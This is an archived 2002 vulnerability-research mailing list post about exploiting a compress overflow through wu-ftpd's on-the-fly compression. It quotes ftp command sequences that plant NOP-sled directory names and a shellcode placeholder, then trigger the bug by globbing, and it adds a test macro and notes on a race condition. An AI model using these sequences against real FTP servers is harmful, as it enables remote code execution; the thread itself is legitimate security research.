Vulnerability Development mailing list archives
Re: compress(vul) + ftpd(?)
From: Gushterul <emild () sinaia globtel ro>
Date: Tue, 12 Mar 2002 14:02:20 +0200 (EET)
You can test with macdef macdef 1 get /*/*/*/*/1.Z $1 Gushterul On Mon, 11 Mar 2002, Pavel Kankovsky wrote:
On Sat, 9 Mar 2002, H D Moore wrote:ftp> mkdir A<254 * 0x90> ftp> cd A*[...]ftp> put <reallysmallscode> ftp> cd ../../../../ ftp> get A*/B*/C*/D*/reallysmallscode.ZAfaik this won't work because glob() does not expand the path unless a file matching the *complete* pattern exists. But if x.Z exists, "get x.Z" will not run compress. Fortunately, we do not get Catch 22 because there is a nice race condition there. To make things better, wu-ftpd appears to compute all filenames matching a pattern during wildcard expansion and drops everything but the first entry of the list afterwards, ie. it is possible to make the delay much longer and easier to exploit.BTW: This is an ANCIENT problem.You would think it would have been fixed by now ;)Oh really? ;) --Pavel Kankovsky aka Peak [ Boycott Microsoft--http://www.vcnet.com/bms ] "Resistance is futile. Open your source code and prepare for assimilation."
Current thread:
- Re: compress(vul) + ftpd(?), (continued)
- Re: compress(vul) + ftpd(?) H D Moore (Mar 07)
- Message not available
- Re: compress(vul) + ftpd(?) HypH (Mar 07)
- Re: compress(vul) + ftpd(?) H D Moore (Mar 07)
- Re: compress(vul) + ftpd(?) HypH (Mar 09)
- Re: compress(vul) + ftpd(?) KF (Mar 09)
- Re: compress(vul) + ftpd(?) HypH (Mar 09)
- Re: compress(vul) + ftpd(?) HypH (Mar 07)
- Re: compress(vul) + ftpd(?) Pavel Kankovsky (Mar 09)
- Re: compress(vul) + ftpd(?) H D Moore (Mar 10)
- Re: compress(vul) + ftpd(?) Pavel Kankovsky (Mar 11)
- Re: compress(vul) + ftpd(?) H D Moore (Mar 12)
- Re: compress(vul) + ftpd(?) Gushterul (Mar 12)
- Re: compress(vul) + ftpd(?) HypH (Mar 11)
- Re: compress(vul) + ftpd(?) Mats Linander (Mar 11)